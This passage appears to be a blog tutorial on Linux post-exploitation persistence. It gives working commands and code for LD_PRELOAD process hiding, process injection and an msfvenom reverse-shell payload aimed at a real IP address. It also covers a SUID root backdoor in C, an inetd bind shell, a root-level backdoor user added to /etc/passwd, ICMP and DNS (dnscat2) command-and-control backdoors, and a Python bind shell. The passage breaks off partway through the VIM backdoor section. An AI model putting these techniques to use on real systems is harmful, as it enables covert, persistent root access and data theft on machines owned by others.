&lt;p&gt;A project on GitHub: &lt;a href="https://github.com/gianlucaborello/libprocesshider" rel="noopener noreferrer"&gt;https://github.com/gianlucaborello/libprocesshider&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Utilise LD_PRELOAD to hijack system functions, as follows:

&lt;span class="c"&gt;# Download and compile the programme&lt;/span&gt;
git clone https://github.com/gianlucaborello/libprocesshider.git
apt-get &lt;span class="nb"&gt;install  &lt;/span&gt;gcc automake autoconf libtool make
&lt;span class="nb"&gt;cd &lt;/span&gt;libprocesshider/ &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; make
&lt;span class="c"&gt;# Move the file to the /usr/local/lib/ directory&lt;/span&gt;
&lt;span class="nb"&gt;cp &lt;/span&gt;libprocesshider.so /usr/local/lib/
&lt;span class="c"&gt;# Load it into the global dynamic linker&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; /usr/local/lib/libprocesshider.so &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/ld.so.preload
&lt;span class="c"&gt;# Alternatively: export LD_PRELOAD=/usr/local/lib/libprocesshider.so&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The specific process name can be configured within the C file.&lt;/p&gt;

&lt;p&gt;A tool to counteract this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;unhide proc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h5&gt;
  
  
  linux-inject
&lt;/h5&gt;

&lt;p&gt;&lt;code&gt;linux-inject&lt;/code&gt; is a tool for injecting shared objects into Linux processes.&lt;/p&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/gaffe23/linux-inject.git" rel="noopener noreferrer"&gt;https://github.com/gaffe23/linux-inject.git&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Download and compile the programme&lt;/span&gt;
git clone https://github.com/gaffe23/linux-inject.git
&lt;span class="nb"&gt;cd &lt;/span&gt;linux-inject &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; make
&lt;span class="c"&gt;# Test process&lt;/span&gt;
./sample-target
&lt;span class="c"&gt;# Process injection&lt;/span&gt;
./inject &lt;span class="nt"&gt;-n&lt;/span&gt; sample-target sample-library.so
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;First, compile one's own defined C file.&lt;br&gt;&lt;br&gt;
Install the dependency packages:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get purge libc6-dev
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;libc6-dev
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;libc6-dev-i386
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;clang
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;span class="n"&gt;__attribute__&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;constructor&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;hello&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;    &lt;span class="n"&gt;puts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Hello world!"&lt;/span&gt;&lt;span class="p"&gt;);}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generate the .so file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gcc &lt;span class="nt"&gt;-shared&lt;/span&gt; &lt;span class="nt"&gt;-fPIC&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; libexcalibra.so hello.c
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;&lt;p&gt;First, execute the test file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Then inject the custom .so file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Injection successful.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Vegile
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Vegile&lt;/code&gt; is a tool for hiding one's own processes; even if the process is killed, it will restart. It leverages the technique where, before executing a certain executable file under Linux, the system pre-loads user-defined dynamic link libraries, which can rewrite system library functions, leading to hijacking.&lt;/p&gt;

&lt;p&gt;First, generate an MSF backdoor:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-a&lt;/span&gt; x64 &lt;span class="nt"&gt;--platform&lt;/span&gt; linux &lt;span class="nt"&gt;-p&lt;/span&gt; linux/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;149.129.72.186  &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;8000  &lt;span class="nt"&gt;-f&lt;/span&gt; elf &lt;span class="nt"&gt;-o&lt;/span&gt; /var/www/html/Excalibra_Backdoor2
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Set up the MSF listener&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Execute&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The first method involves process injection; the second ensures that the reverse shell reconnects even if the process is terminated.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Due to dependencies, the second method has a minor bug.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Then test should be successful.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Cymothoa
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Cymothoa&lt;/code&gt; is a lightweight backdoor that also employs process injection.&lt;/p&gt;

&lt;p&gt;Download address: &lt;a href="https://sourceforge.net/projects/cymothoa/files/latest/download" rel="noopener noreferrer"&gt;https://sourceforge.net/projects/cymothoa/files/latest/download&lt;/a&gt;&lt;br&gt;&lt;br&gt;
Compiled binary: &lt;a href="https://github.com/BlackArch/cymothoa-bin" rel="noopener noreferrer"&gt;https://github.com/BlackArch/cymothoa-bin&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Usage:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./cymothoa &lt;span class="nt"&gt;-S&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;View available shellcodes. Only the reverse shell functionality is required; 0 will suffice.&lt;/p&gt;

&lt;p&gt;Locate the PID of bash, as the bash process is typically always present.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./cymothoa &lt;span class="nt"&gt;-p&lt;/span&gt; pid &lt;span class="nt"&gt;-s&lt;/span&gt; 1 &lt;span class="nt"&gt;-y&lt;/span&gt; port
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It is not very controllable; during my Kali testing, it caused the process to die. It is not recommended for use in live environments.&lt;/p&gt;

&lt;p&gt;If successful, nc can directly connect to the custom port, which depends on the environment.&lt;/p&gt;

&lt;h3&gt;
  
  
  Setuid and Setgid
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;setuid&lt;/code&gt;: When set on an executable file, it allows the file to execute with the permissions of the file's owner. A typical file is &lt;code&gt;/usr/bin/passwd&lt;/code&gt;. If an ordinary user executes that file, during execution the file obtains root privileges, thereby enabling the user to change their password.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;setgid&lt;/code&gt;: This permission is only effective for directories. When set on a directory, any file created within that directory will have the same group ownership as the directory itself.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;sticky bit&lt;/code&gt;: This bit can be understood as a deletion-prevention bit. Whether a file can be deleted by a user mainly depends on whether the group to which the file belongs has write permission for that user. Without write permission, all files in that directory cannot be deleted, nor can new files be added. If one wishes to allow users to add files but not delete them, the sticky bit can be applied to the directory. Once set, even if a user has write permission on the directory, they cannot delete the file.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;As is well known, Linux file permissions are expressed as 777, 666, etc. In fact, by adding the SUID permission to a file, one can run that file with the privileges of its owner. Therefore, one need only copy the bash binary to another location, assign SUID with root ownership, and whenever any user runs this shell, they can execute any file with root privileges.&lt;/p&gt;

&lt;p&gt;Write a simple backdoor in &lt;code&gt;backdoor.c&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[])&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;setuid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;setgid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;execl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"/bin/sh"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"sh"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"-c"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;
        &lt;span class="n"&gt;execl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"/bin/sh"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"sh"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Compile:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gcc backdoor.c &lt;span class="nt"&gt;-o&lt;/span&gt; backdoor
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cp &lt;/span&gt;backdoor /bin/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;chmod &lt;/span&gt;u+s /bin/backdoor
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Execute &lt;code&gt;backdoor&lt;/code&gt; as the user.&lt;/p&gt;

&lt;h3&gt;
  
  
  inetd Backdoor
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;inetd&lt;/code&gt; is a daemon that monitors network requests and invokes the corresponding service process to handle the connection request. It can manage connections for multiple services; when &lt;code&gt;inetd&lt;/code&gt; receives a connection, it determines which programme is required, starts the corresponding process, and passes the socket to it (the service socket becomes the programme's standard input, output, and error descriptors).&lt;/p&gt;

&lt;p&gt;Installation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;openbsd-inetd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Utilise a system-provided service.&lt;/p&gt;

&lt;p&gt;Configure the backdoor:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# vi /etc/inetd.conf    &lt;/span&gt;
fido  stream tcp nowait  root  /bin/bash bash &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="c"&gt;# When an external request for the service named 'fido' arrives, a shell is spawned&lt;/span&gt;

inetd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then connect via nc.&lt;/p&gt;

&lt;p&gt;Reference: &lt;a href="https://klionsec.github.io/2017/10/23/inetd-backdoor/" rel="noopener noreferrer"&gt;Brief Analysis and Exploitation of inetd Backdoor&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Adding a Backdoor User
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Generate password
perl &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s1"&gt;'print crypt("excalibra", "AA"). "\n"'&lt;/span&gt;
Directly append to passwd
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"weblogic1:AAyx65VrBb.fI:0:0:root:/root:/bin/bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;/etc/passwd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is easily detectable; it is more advisable to use an SSH key instead.&lt;/p&gt;

&lt;h3&gt;
  
  
  ICMP Backdoor
&lt;/h3&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/andreafabrizi/prism" rel="noopener noreferrer"&gt;https://github.com/andreafabrizi/prism&lt;/a&gt;&lt;br&gt;&lt;br&gt;
Compilation:&lt;/p&gt;

&lt;p&gt;For the Android platform:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;gcc-arm-linux-gnueabi
arm-linux-gnueabi-gcc &lt;span class="nt"&gt;-DSTATIC&lt;/span&gt; &lt;span class="nt"&gt;-DDETACH&lt;/span&gt; &lt;span class="nt"&gt;-DNORENAME&lt;/span&gt; &lt;span class="nt"&gt;-static&lt;/span&gt; &lt;span class="nt"&gt;-march&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;armv5 prism.c &lt;span class="nt"&gt;-o&lt;/span&gt; prism
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For Linux 64-bit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;libc6-dev-amd64
gcc &lt;span class="nt"&gt;-DDETACH&lt;/span&gt; &lt;span class="nt"&gt;-m64&lt;/span&gt; &lt;span class="nt"&gt;-Wall&lt;/span&gt; &lt;span class="nt"&gt;-s&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; prism prism.c
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For Linux 32-bit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;libc6-dev-i386
gcc &lt;span class="nt"&gt;-DDETACH&lt;/span&gt; &lt;span class="nt"&gt;-m32&lt;/span&gt; &lt;span class="nt"&gt;-Wall&lt;/span&gt; &lt;span class="nt"&gt;-s&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; prism prism.c
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On the attack machine, await the backdoor connection:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nc &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; 9999
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Send the packet to trigger the backdoor.&lt;/p&gt;

&lt;h3&gt;
  
  
  DNS Backdoor
&lt;/h3&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/iagox86/dnscat2" rel="noopener noreferrer"&gt;https://github.com/iagox86/dnscat2&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Even in the most restrictive environments, the target will almost certainly permit DNS resolution of external or internal domains. This can serve as a C2 channel. Commands and data are intermingled within DNS query and response headers, making detection extremely difficult because commands are concealed within normal traffic.&lt;/p&gt;

&lt;p&gt;We will utilise &lt;code&gt;dnscat2&lt;/code&gt; to implement this.&lt;/p&gt;

&lt;p&gt;My macOS installation experienced issues; the environment proved troublesome, so I reverted to Kali. Ultimately, I used the host machine. The server requires a source change; it is recommended to directly specify &lt;code&gt;https://gems.ruby-china.com/&lt;/code&gt; within the Gemfile.&lt;/p&gt;

&lt;p&gt;My configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ruby"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Gemfile&lt;/span&gt;
&lt;span class="c1"&gt;# By Ron Bowes&lt;/span&gt;
&lt;span class="c1"&gt;#&lt;/span&gt;
&lt;span class="c1"&gt;# See LICENSE.md&lt;/span&gt;

&lt;span class="n"&gt;source&lt;/span&gt; &lt;span class="s1"&gt;'https://gems.ruby-china.com/'&lt;/span&gt;

&lt;span class="n"&gt;gem&lt;/span&gt; &lt;span class="s1"&gt;'trollop'&lt;/span&gt; &lt;span class="c1"&gt;# Commandline parsing&lt;/span&gt;
&lt;span class="n"&gt;gem&lt;/span&gt; &lt;span class="s1"&gt;'salsa20'&lt;/span&gt; &lt;span class="c1"&gt;# Encrypted connections&lt;/span&gt;
&lt;span class="n"&gt;gem&lt;/span&gt; &lt;span class="s1"&gt;'sha3'&lt;/span&gt;    &lt;span class="c1"&gt;# Message signing + key derivation&lt;/span&gt;
&lt;span class="n"&gt;gem&lt;/span&gt; &lt;span class="s1"&gt;'ecdsa'&lt;/span&gt;   &lt;span class="c1"&gt;# Used for ECDH key exchange&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;gem &lt;span class="nb"&gt;install &lt;/span&gt;bundler
&lt;span class="nv"&gt;$ &lt;/span&gt;bundle &lt;span class="nb"&gt;install&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Start the server:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;ruby dnscat2.rb &lt;span class="nt"&gt;--dns&lt;/span&gt; &lt;span class="s2"&gt;"domain=attck.me,host=192.168.123.192"&lt;/span&gt; &lt;span class="nt"&gt;--no-cache&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then compile the client; simply run &lt;code&gt;make&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./dnscat &lt;span class="nt"&gt;--dns&lt;/span&gt; &lt;span class="nv"&gt;server&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.123.192
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On the host machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;session &lt;span class="nt"&gt;-i&lt;/span&gt; 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I will capture packets to observe how communication occurs.&lt;/p&gt;

&lt;p&gt;All commands are transmitted via DNS traffic.&lt;/p&gt;

&lt;p&gt;You may test the PowerShell version of dnscat2.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;Start-Dnscat2&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Domain&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;attck.me&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-DNSServer&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;192.168.123.192&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It is now online.&lt;/p&gt;

&lt;p&gt;Then open a new interactive shell.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Using dnscat2 offers several advantages:  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Supports multiple sessions
&lt;/li&gt;
&lt;li&gt;Traffic encryption
&lt;/li&gt;
&lt;li&gt;Protection against MiTM attacks via keys
&lt;/li&gt;
&lt;li&gt;Ability to run PowerShell scripts directly from memory&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  VIM Backdoor
&lt;/h3&gt;

&lt;p&gt;First, construct a malicious script &lt;code&gt;excalibra.py&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;socket&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;threading&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;time&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;SOCK_STREAM&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;bind&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;0.0.0.0&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;666&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;listen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;waiting for connect&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;
        &lt;span class="n"&gt;talk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;accept&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;connect from&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;addr&lt;/span&gt;
        &lt;span class="n"&gt;proc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Popen&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/bin/sh&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-i&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;stdin&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;talk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                &lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;talk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;talk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shell&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The prerequisite is that VIM has Python extensions installed; by default, when installed, Python extensions are included.&lt;/p&gt;

&lt;p&gt;The script can be placed in Python's extension directory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
